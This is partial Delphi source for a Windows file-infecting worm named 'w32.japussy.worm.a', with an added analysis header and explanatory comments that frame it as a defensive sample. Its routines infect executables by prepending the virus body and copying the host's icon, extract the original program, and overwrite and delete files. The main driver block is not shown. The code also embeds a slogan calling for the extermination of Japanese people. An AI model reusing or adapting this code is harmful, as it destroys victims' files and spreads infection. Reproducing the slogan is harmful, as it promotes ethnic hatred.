{
  ANALYSIS NOTE (added for review; not part of the original source):
  This is the partial source of a Windows file-infecting worm -- it names
  itself "w32.japussy.worm.a" in the catchword string below. It is
  annotated here for defensive analysis only: every code token is reproduced
  exactly as published and nothing has been "fixed" or completed. Handle it
  only in an isolated lab -- compiling and running it infects and destroys
  files. The listing stops before the main program block (the original page
  marks it "to be continued"), so the driver logic that would call the
  routines below -- directory walking, choosing victims, hiding the process,
  launching the extracted host -- is not visible and is not described here.
}
program japussy;

uses
  windows, sysutils, classes, graphics, shellapi{, registry};

const
  headersize = 82432; // size in bytes of the virus body that is prepended to
                      // every host: extractfile and infectonefile both treat
                      // offset headersize of the running image as the start
                      // of the original host program
  iconoffset = $12eb8; // file offset of the stub's own main icon resource;
                       // infectonefile overwrites this range with the host's
                       // icon so the infected file keeps the host's appearance

  // author's note: sizes as built with delphi5 sp1 -- other delphi versions
  // will differ.
  // author's note: the main icon offset was found by searching the image for
  // the hex byte string 28 00 00 00 20 (presumably the 40-byte
  // BITMAPINFOHEADER of a 32-pixel icon image -- not verified here).

  {
  headersize = 38912; // virus body size when the stub is upx-compressed
  iconoffset = $92bc; // main icon offset when the stub is upx-compressed

  // upx 1.24w usage: upx -9 --8086 japussy.exe
  }
  iconsize = $2e8; // size of the PE main icon image -- 744 bytes
  icontail = iconoffset + iconsize; // end of the main icon inside the stub
  id = $44444444; // infection marker: written as the last 4 bytes of every
                  // infected file and checked before infecting (infectonefile)

  // junk text; smashfile writes this into victims' files before deleting them
  catchword = 'if a race need to be killed out, it must be yamato. ' +
    'if a country need to be destroyed, it must be japan! ' +
    '*** w32.japussy.worm.a ***';

{$r *.res}

// Win9x-only kernel32 export, declared here but not called anywhere in the
// visible part of the listing. On 9x it is commonly used to hide a process
// from the task list -- presumably the intent, but the call site is not shown.
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
  stdcall; external 'kernel32.dll'; // external declaration

var
  tmpfile: string;          // not referenced in the visible portion
  si: startupinfo;          // not referenced in the visible portion
                            // (fillstartupinfo takes its own var parameter)
  pi: process_information;  // not referenced in the visible portion
  isjap: boolean = false;   // "running on a Japanese-language OS" flag; never
                            // assigned or read in the visible portion

{ Returns true when GetVersionEx reports platform id
  VER_PLATFORM_WIN32_WINDOWS (Windows 95/98/Me). Returns false for the
  NT family and also when GetVersionEx itself fails. }
function iswin9x: boolean;
var
  ver: tosversioninfo;
begin
  result := false;
  ver.dwosversioninfosize := sizeof(tosversioninfo); // required before the call
  if not getversionex(ver) then
    exit; // query failed: report "not 9x"
  if (ver.dwplatformid = ver_platform_win32_windows) then // win9x
    result := true;
end;

{ Copies count bytes from src (starting at sstartpos) to dst (starting at
  dstartpos), then restores both streams' original positions. Both seeks use
  origin 0 (from beginning). There is no bounds checking of its own; it relies
  on tstream.copyfrom to raise if src holds fewer than count bytes from
  sstartpos. }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
  dstartpos: integer; count: integer);
var
  scurpos, dcurpos: integer;
begin
  scurpos := src.position; // remember positions so the caller's streams are
  dcurpos := dst.position; // left exactly where they were
  src.seek(sstartpos, 0);
  dst.seek(dstartpos, 0);
  dst.copyfrom(src, count);
  src.seek(scurpos, 0);
  dst.seek(dcurpos, 0);
end;

{ Writes the original host program out to filename: opens the running image
  (paramstr(0)) read-only with share-deny-none, skips the first headersize
  bytes (the virus body) and copies everything after them into a newly
  created file. Presumably used by the unseen main block so the stub can run
  the real program after its own work and stay unnoticed -- the caller is not
  visible. Every exception is swallowed by the empty except handler, so a
  failure (file in use, disk full, bad path) returns silently. }
procedure extractfile(filename: string);
var
  sstream, dstream: tfilestream;
begin
  try
    sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
    try
      dstream := tfilestream.create(filename, fmcreate);
      try
        sstream.seek(headersize, 0); // skip the virus body at the front
        dstream.copyfrom(sstream, sstream.size - headersize); // the host follows it
      finally
        dstream.free;
      end;
    finally
      sstream.free;
    end;
  except
  end;
end;

{ Initialises a STARTUPINFO record for a CreateProcess call with only the
  show-window state set: dwflags = STARTF_USESHOWWINDOW and wshowwindow =
  state; desktop, title and the reserved fields are cleared. Only the fields
  listed here are written -- any other member of si keeps whatever the caller
  left in it. No caller is in the visible portion of the listing. }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
  si.cb := sizeof(si);
  si.lpreserved := nil;
  si.lpdesktop := nil;
  si.lptitle := nil;
  si.dwflags := startf_useshowwindow;
  si.wshowwindow := state;
  si.cbreserved2 := 0;
  si.lpreserved2 := nil;
end;

{ Send an infected mail -- never implemented. The body is empty and the
  author's comment asks "whichever fellow is willing to finish this?", so
  mail propagation does not exist in this version of the source. }
procedure sendmail;
begin
  // author's note: which fellow is willing to finish this?
end;

{ Prepends the virus body to one PE file, rewriting it in place with this
  layout:

    [0, iconoffset)           stub bytes copied from the running image (paramstr(0))
    [iconoffset, icontail)    the HOST's main icon image (744 bytes), so the
                              infected file keeps the host's icon
    [icontail, headersize)    the remaining stub bytes
    [headersize, +host size)  the original host file, unchanged
    last 4 bytes              infection marker id ($44444444)

  Skipped silently: a file whose name compares case-insensitively equal to
  'japussy.exe' (the name as passed in, so a path prefix defeats the check),
  files smaller than 10240 bytes, files already ending in the marker, and
  anything not recognised as PE. The PE test is weak: it only looks for the
  two bytes 'P','E' (#80 #69) at some offset 0..$108 -- no MZ check and no
  e_lfanew lookup, so any file with "PE" in its first 0x10A bytes qualifies.

  The whole routine sits in try/except with an empty handler, so locked or
  unreadable files are skipped without any error. NOTE for incident
  responders: dststream.savetofile is in a finally block, not after the copy
  steps succeed, so if any copystream call raises (for example the icon
  stream is shorter than 22 + 744 bytes) whatever has been assembled so far
  is still written over the host -- a failed infection can leave a truncated
  or corrupt victim rather than an untouched one. }
procedure infectonefile(filename: string);
var
  hdrstream, srcstream: tfilestream;
  icostream, dststream: tmemorystream;
  iid: longint;
  aicon: ticon;
  infected, ispe: boolean;
  i: integer;
  buf: array[0..1] of char;
begin
  try // any error is taken to mean "file in use" and the routine bails out
    if comparetext(filename, 'japussy.exe') = 0 then // do not infect itself
      exit;
    infected := false;
    ispe := false;
    srcstream := tfilestream.create(filename, fmopenread);
    try
      for i := 0 to $108 do // scan the start of the file for the PE signature
      begin
        srcstream.seek(i, sofrombeginning);
        srcstream.read(buf, 2);
        if (buf[0] = #80) and (buf[1] = #69) then // 'P','E'
        begin
          ispe := true; // treated as a PE file
          break;
        end;
      end;
      srcstream.seek(-4, sofromend); // the marker lives in the last 4 bytes
      srcstream.read(iid, 4);
      if (iid = id) or (srcstream.size < 10240) then // already infected, or too small
        infected := true;
    finally
      srcstream.free;
    end;
    if infected or (not ispe) then // nothing to do for non-PE or marked files
      exit;
    icostream := tmemorystream.create;
    dststream := tmemorystream.create;
    try
      aicon := ticon.create;
      try
        // capture the victim's first icon (expected to be the 744-byte main
        // icon) into icostream via ticon.savetostream
        aicon.releasehandle;
        aicon.handle := extracticon(hinstance, pchar(filename), 0);
        aicon.savetostream(icostream);
      finally
        aicon.free;
      end;
      srcstream := tfilestream.create(filename, fmopenread);
      // the running image supplies the virus body ("header")
      hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
      try
        // stub bytes up to its main icon
        copystream(hdrstream, 0, dststream, 0, iconoffset);
        // the victim's main icon, starting 22 bytes into the saved .ico
        // stream -- presumably skipping the ICONDIR (6 bytes) + one
        // ICONDIRENTRY (16 bytes) header so only the raw image is copied;
        // exactly iconsize bytes are taken regardless of the icon's real size
        copystream(icostream, 22, dststream, iconoffset, iconsize);
        // stub bytes from the end of its icon to the end of the virus body
        copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
        // the whole original host program
        copystream(srcstream, 0, dststream, headersize, srcstream.size);
        // infection marker appended at the very end (seek origin 2 = from end)
        dststream.seek(0, 2);
        iid := $44444444;
        dststream.write(iid, 4);
      finally
        hdrstream.free;
      end;
    finally
      srcstream.free;
      icostream.free;
      dststream.savetofile(filename); // overwrite the host with the infected image
      dststream.free;
    end;
  except;
  end;
end;

{ Destroys a file: clears its attributes (dropping read-only), opens it for
  writing, overwrites catchword at max evenly spaced offsets, closes it and
  deletes it. max is random(15) raised to at least 5, so 5..14 writes, each
  len bytes, at offsets i * (size div max) starting from 0. All errors are
  swallowed by the empty except handler. filewrite is handed the string
  constant catchword itself as the untyped buffer with len = length(catchword);
  whether Delphi passes the characters or the string's pointer in that case
  is not verified here -- either way the file is overwritten and then deleted. }
procedure smashfile(filename: string);
var
  filehandle: integer;
  i, size, mass, max, len: integer;
begin
  try
    setfileattributes(pchar(filename), 0); // remove read-only (and all other) attributes
    filehandle := fileopen(filename, fmopenwrite); // open for writing
    try
      size := getfilesize(filehandle, nil); // file size in bytes
      i := 0;
      randomize;
      max := random(15); // number of junk writes, 0..14 ...
      if max < 5 then
        max := 5;        // ... but never fewer than 5
      mass := size div max; // spacing between writes
      len := length(catchword);
      while i < max do
      begin
        fileseek(filehandle, i * mass, 0); // position for this write
        // overwrite with the junk text so the content is unrecoverable
        filewrite(filehandle, catchword, len);
        inc(i);
      end;
    finally
      fileclose(filehandle); // close the file
    end;
    deletefile(pchar(filename)); // then delete it
  except
  end;
end;

{ (to be continued) -- the original page ends here; the main program block
  is not part of this listing. }